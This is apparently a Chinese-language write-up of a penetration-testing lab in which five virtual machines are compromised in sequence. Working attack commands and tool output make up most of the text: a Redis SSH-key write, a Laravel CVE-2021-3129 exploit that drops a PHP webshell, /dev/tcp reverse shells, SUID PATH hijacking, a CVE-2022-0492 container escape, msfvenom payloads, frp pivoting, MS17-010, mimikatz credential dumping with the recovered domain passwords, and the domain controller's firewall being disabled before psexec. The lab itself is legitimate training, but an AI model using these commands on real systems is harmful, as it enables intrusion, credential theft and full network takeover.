信息收集
使用arp进行主机发现
sudo arp-scan -l
nmap扫描主机192.168.206.20
sudo nmap -n -v -sS --min-rate 10000 -p- -Pn 192.168.206.20
扫描结果
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-24 14:38 CST
Initiating ARP Ping Scan at 14:38
Scanning 192.168.206.20 [1 port]
Completed ARP Ping Scan at 14:38, 0.14s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:38
Scanning 192.168.206.20 [65535 ports]
Discovered open port 22/tcp on 192.168.206.20
Discovered open port 80/tcp on 192.168.206.20
Discovered open port 81/tcp on 192.168.206.20
Discovered open port 6379/tcp on 192.168.206.20
Completed SYN Stealth Scan at 14:38, 6.15s elapsed (65535 total ports)
Nmap scan report for 192.168.206.20
Host is up (0.00018s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
6379/tcp open redis
MAC Address: 00:0C:29:24:CB:F0 (VMware)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.51 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
访问80 和 81端口
Web渗透
Redis未授权访问
redis-cli -h 192.168.149.20
尝试写入公钥进行登录
生成公钥文件
ssh-keygen -t rsa ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTxA54DkKtGgrD+PCEjNE7Z1m7BG5UZV02Lv2yaqf4oxEsY6SZLsLvFi7vtonWbBwjs/wzgsiUE07B+M0MUGBfikPikD8BVgd7/pDE5eYHtnoFB5TJSeRC7cfH8TDnZ9eFbxRB5iosKL8wOdX5fLFWhDmotKC47ZLnP5QacraMPc+AHC7N//swO9cs7WOXyFNATLUwcZePwnDja0DlWs1uxRBp9OHJcmUwG9Tb+v/RXBjx1Qo7ovwa7izI8cGM+YdSKrkBXMneP92cENo5oaJxnlXh5PhpfnAAIQ2Zzqz9nadLj8HrCCjnfhIOQBbvo5AjNy1+IhfWCi14AGijq3KGYIjF4MdIuFGF2axTxLra9XMxpiM+DakjHjYPkNPq9OYeS9IgSl8/spPx2B6hmsVkoBah51eJW9+ixytSwxH6QnNTs6eATaAc2VoYUppTC0XwUZos4WrM8LJ+uHN1yePnbts573yIM04u6CW0zSKhaIJjpCY+aHmD43BsUr8dyss= jojo@kali
写入公钥
config get dir config get dbfilename config set dir /root/.ssh/ config set dbfilename authorized_keys set xz "\n\n\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTxA54DkKtGgrD+PCEjNE7Z1m7BG5UZV02Lv2yaqf4oxEsY6SZLsLvFi7vtonWbBwjs/wzgsiUE07B+M0MUGBfikPikD8BVgd7/pDE5eYHtnoFB5TJSeRC7cfH8TDnZ9eFbxRB5iosKL8wOdX5fLFWhDmotKC47ZLnP5QacraMPc+AHC7N//swO9cs7WOXyFNATLUwcZePwnDja0DlWs1uxRBp9OHJcmUwG9Tb+v/RXBjx1Qo7ovwa7izI8cGM+YdSKrkBXMneP92cENo5oaJxnlXh5PhpfnAAIQ2Zzqz9nadLj8HrCCjnfhIOQBbvo5AjNy1+IhfWCi14AGijq3KGYIjF4MdIuFGF2axTxLra9XMxpiM+DakjHjYPkNPq9OYeS9IgSl8/spPx2B6hmsVkoBah51eJW9+ixytSwxH6QnNTs6eATaAc2VoYUppTC0XwUZos4WrM8LJ+uHN1yePnbts573yIM04u6CW0zSKhaIJjpCY+aHmD43BsUr8dyss= jojo@kali \n\n\n" save
指定公钥 登录主机
ssh -i ~/.ssh/id_rsa root@192.168.149.20
收集本机信息
ip:192.168.149.20 192.168.52.10 cat /etc/nginx/conf.d/81.conf
发现是将192.168.52.20:8000端口 的服务反向代理到本机的81端口 也就是说本机81端口上的服务 是运行在192.168.52.20这台机器上的
CVE-2021-3129
发现laravel 版本为v8.29.0 存在 CVE-2021-3129 使用exp验证 修改脚本 写入php一句话
GitHub - zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)
system('echo PD9waHAgZXZhbCgiJF9QT1NUW2NtZF0iKTs/Pg==|base64 -d >/var/www/html/shell.php ');
运行 后访问shell.php
python3 exp.py http://192.168.149.20:81/
可以访问到shell.php
使用蚁剑进行连接
发现是docker 且 不出网 需要将shell反弹到192.168.52.10(ubuntu1)进行利用
cat /proc/1/cgroup
由于是www-data用户 权限低 逃逸需要高权限 这里先进行提权再进行逃逸
find / -type f -perm -04000 -ls 2>/dev/null
列出设置了 SUID 或 SGID 位的文件
发现/home/jobs/shell demo.c
#include<unistd.h> void main() { setuid(0); setgid(0); system("ps"); // 执行ps }
反弹shell到ubuntu1
bash -c 'bash -i >& /dev/tcp/192.168.52.10/6677 0>&1'
修改ps命令指向/tmp/ps ps执行后为bash
echo '/bin/bash' > /tmp/ps chmod 777 /tmp/ps export PATH=/tmp:$PATH echo $PATH
执行 shell文件 得到root权限
上传脚本检测docker逃逸漏洞 发现存在四个漏洞
git clone https://github.com/teamssix/container-escape-check.git ./container-escape-check.sh
CVE-2022-0492 容器逃逸
容器内 root权限 执行
unshare -UrmC bash mkdir /tmp/testcgroup mount -t cgroup -o memory cgroup /tmp/testcgroup d=`dirname $(ls -x /tmp/testcgroup/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release printf '#!/bin/bash\n/bin/bash -i >& /dev/tcp/192.168.52.10/7788 0>&1' > /exp.sh; chmod 777 /exp.sh t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$t/exp.sh" > $d/release_agent sh -c "echo 0 >$d/w/cgroup.procs"
执行后 shell已经反弹回来
内网渗透
至此已经拿下两台linux主机
ubuntu1 和 ubuntu2 整理一下
ubuntu1 ip:192.168.149.20 192.168.52.10 ubuntu2 ip:192.168.52.20 192.168.93.10
ubuntu1 上线 msf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.149.49 LPORT=3344 -f elf -o reverse.elf msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost 192.168.149.49; set lport 3344; exploit" 写入路由 run post/multi/manage/autoroute
ubuntu2 上线 msf
msfvenom -p linux/x64/meterpreter/bind_tcp LHOST=192.168.149.49 LPORT=4455 -f elf -o bind.elf msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/bind_tcp; set lhost 192.168.149.49; set lport 4455; exploit"
上传frp到ubuntu2 开启socks代理
上传fscan到ubuntu2 扫描 192.168.52.0/24
start infoscan 192.168.52.20:22 open 192.168.52.10:22 open 192.168.52.10:80 open 192.168.52.10:81 open 192.168.52.20:8000 open 192.168.52.30:8080 open [*] alive ports len is: 6 start vulscan [*] WebTitle: http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统 [+] InfoScan:http://192.168.52.30:8080 [通达OA] [*] WebTitle: http://192.168.52.10 code:404 len:548 title:404 Not Found [*] WebTitle: http://192.168.52.10:81 code:200 len:17474 title:Laravel [*] WebTitle: http://192.168.52.20:8000 code:200 len:17474 title:Laravel [+] InfoScan:http://192.168.52.10:81 [Laravel] [+] InfoScan:http://192.168.52.20:8000 [Laravel] [+] http://192.168.52.30:8080 tongda-user-session-disclosure [+] http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129 [+] http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
发现通达OA有漏洞
蚁剑设置代理连接 为system权限
上传fscan扫描 192.168.93.0/24
192.168.93.20:445 open 192.168.93.40:139 open 192.168.93.20:1080 open 192.168.93.30:88 open 192.168.93.20:8080 open 192.168.93.40:445 open 192.168.93.30:139 open 192.168.93.30:445 open 192.168.93.20:139 open 192.168.93.40:135 open 192.168.93.30:135 open 192.168.93.20:135 open 192.168.93.10:22 open [+] 192.168.93.30 MS17-010 (Windows Server 2012 R2 Datacenter 9600) [*] WebTitle: http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公系统 [*] NetBios: 192.168.93.20 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1 [+] 192.168.93.20 MS17-010 (Windows 7 Professional 7601 Service Pack 1) [*] NetInfo: [*]192.168.93.30 [->]DC [->]192.168.93.30 [+] InfoScan:http://192.168.93.20:8080 [通达OA] [*] NetBios: 192.168.93.30 [+]DC DC.whoamianony.org Windows Server 2012 R2 Datacenter 9600 [+] 192.168.93.40 MS17-010 (Windows 7 Professional 7601 Service Pack 1) [+] http://192.168.93.20:8080 tongda-user-session-disclosure
跳板机信息收集
抓密码
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > res.txt
域控:192.168.93.30 DC.whoamianony.org 域:whoamianony.org 存活主机: 192.168.93.10 ubuntu2 192.168.93.20 Windows 7 Professional 7601 Service Pack 1 ms17-010 跳板机 192.168.93.30 DC Windows Server 2012 R2 Datacenter 9600 192.168.93.40 Windows 7 Professional 7601 Service Pack 1 ms17-010 账号:Administrator 密码:Whoami2021 bunny Bunny2021
因为是双层网络 需要搭建二层代理
# frps.ini [common] bind_port = 7000
#frpc.ini [common] server_addr = 192.168.1.102 server_port = 7000 [socks5_forward] type = tcp local_ip = 192.168.52.10 local_port = 10808 remote_port = 6005
#frps.ini [common] Bind_addr = 192.168.52.10 bind_port = 7000
#frpc.ini [common] server_addr = 192.168.52.10 server_port = 7000 [plugin_socks] type = tcp remote_port = 10808 plugin = socks5
代理搭建好后使用proxychains代理msf
拿下192.168.93.40 (ms17_010)
拿下192.168.93.20 (ms17_010)
使用sc 关闭dc防火墙
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator" sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \\192.168.93.30 start unablefirewall
使用psexec上线 DC192.168.93.30
use exploit/windows/smb/psexec set payload windows/x64/shell_bind_tcp set smbuser administrator set smbpass Whoami2021 set rhost 192.168.93.30 run
至此所有五台靶机的shell都已拿到,渗透完毕。